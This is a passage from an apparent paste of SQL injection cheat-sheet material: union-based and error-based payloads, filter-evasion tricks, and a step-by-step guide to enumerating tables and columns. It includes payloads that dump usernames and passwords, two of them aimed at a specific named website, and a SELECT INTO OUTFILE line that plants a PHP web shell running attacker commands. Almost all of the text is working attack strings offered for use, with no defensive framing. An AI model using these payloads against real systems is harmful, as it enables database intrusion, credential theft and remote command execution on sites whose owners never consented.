  702. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  703. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  704. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  705. ===================================================================================================================================
  706. Error Based:
  707. ===================================================================================================================================
  708. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  709.  
  710. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  711.  
  712. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  713. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  714.  
  715. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  716.  
  717. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  718.  
  719. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  720.  
  721. or 1=convert(int,(@@version))-
  722. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  723. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  724.  
  725. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  726. ===================================================================================================================================
  727. WAF BYPASS BY TOTTI
  728. ===================================================================================================================================
  729.  
  730. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  731.  
  732. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  733.  
  734. ===================================================================================================================================
  735. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  736.  
  737. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  738. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  739.  
  740. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  741. ===================================================================================================================================
  742.  
  743. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  744. ===================================================================================================================================
  745.  
  746. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  747.  
  748. http://www.websec.ca/kb/sql_injection
  749.  
  750. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  751.  
  752. ===================================================================================================================================
  753. test
  754.  
  755. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  756.  
  757. …………………………………..
  758. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  759.  
  760. SELECT “<? system($_REQUEST['cmd']); ?>”
  761. INTO OUTFILE “full/path/here/cmd.php”
  762.  
  763. _____________________________________________________
  764.  
  765. for more exclusive hacking tutorials visit : http://bit.ly/1Mfv5G3
  766. ==============================
  767. SqL Injection Commad
  768. ==============================
  769. Get Columns Number
  770. ==============================
  771. +order+by+
  772. ==============================
  773. get infected column
  774. ==============================
  775. +union+select+
  776. ==============================
  777. Get database name
  778. ==============================
  779. Database()
  780. ==============================
  781. Get database version
  782. ==============================
  783. Version()
  784. ==============================
  785. get database user
  786. User()
  787. ==============================
  788. get all tables
  789. ==============================
  790. Place this command on the infected collum
  791. ==============================
  792. group_concat(table_name)
  793. ==============================
  794. place this command on the final of the url
  795. ==============================
  796. +from+information_schema.tables+where+table_schema =database()--
  797. ==============================
  798. get all columns
  799. ==============================
  800. Place this command on the infected collum
  801. ==============================
  802. group_concat(column_name)
  803. ==============================
  804. place this one on the final of the link
  805. ==============================
  806. +from+information_schema.columns+where+table_schem a=database()--
  807. ==============================
  808. Bypass WAD
  809. ==============================
  810. Union Select WAF bypass
  811. ==============================
  812. Add this filter
  813. ==============================
  814. /*! */
  815. ==============================
  816. to
  817. ==============================
  818. select
  819. ==============================
  820. to be
  821. ==============================
  822. /*!select*/
  823. ==============================
  824. if it was not successfully change this
  825. ==============================
  826. select
  827. ==============================
  828. to
  829. ==============================
  830. /*!SeLeCt*/
  831. ==============================
  832. Capital and small letters
  833. ==============================
  834. Bypass WAF when getting tables
  835. ==============================
  836. Change this
  837. ==============================
  838. select
  839. ==============================
  840. to this
  841. ==============================
  842. /*!SeLeCt*/
  843. ==============================
  844. and this
  845. ==============================
  846. group_concat(table_name)
  847. ==============================
  848. to this
  849. ==============================
  850. /*!GrOuP_CoNcAT(table_name)*/
  851. ==============================
  852. and place this on the finish of the url
  853. ==============================
  854. +from+information_schema.tables+where+table_schema =database()--
  855. ==============================
  856. Bypass WAF when getting Columns
  857. ==============================
  858. change this
  859. ==============================
  860. select
  861. ==============================
  862. to this
  863. ==============================
  864. /*!SeLeCt*/
  865. ==============================
  866. change this
  867. ==============================
  868. group_concat(column_name)
  869. ==============================
  870. to this
  871. ==============================
  872. /*!GrOuP_CoNcAT(column_name)*/
  873. ==============================
  874. and place this on the final of the link
  875. ==============================
  876. +from+information_schema.columns+where+table_schem a=database()--
  877. ==============================
  878. to be like this
  879. ==============================
  880. +
  881. ==============================
  882. from+information_schema./*!columns*/+where+table_schema=database()--
  883. ==============================
  884. Additional command for waf bypass
  885. ==============================
  886. place this on the infected collumn
  887. ==============================
  888. concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
  889. ==============================
  890. and place this on the finish of the link
  891. ==============================
  892. +from+information_schema.columns--
  893. ==============================
  894. columns number can't be shown ?
  895. ==============================
  896. add this
  897. ==============================
  898. +--+
  899. ==============================
  900. to the finish of the url
  901. ==============================
  902. and add this
  903. ==============================
  904. '
  905. ==============================
  906. after
  907. ==============================
  908. .php?id=1
  909. ==============================
  910. to be like this
  911. ==============================
  912. .php?id=1'
  913. ==========================
RAW Paste Data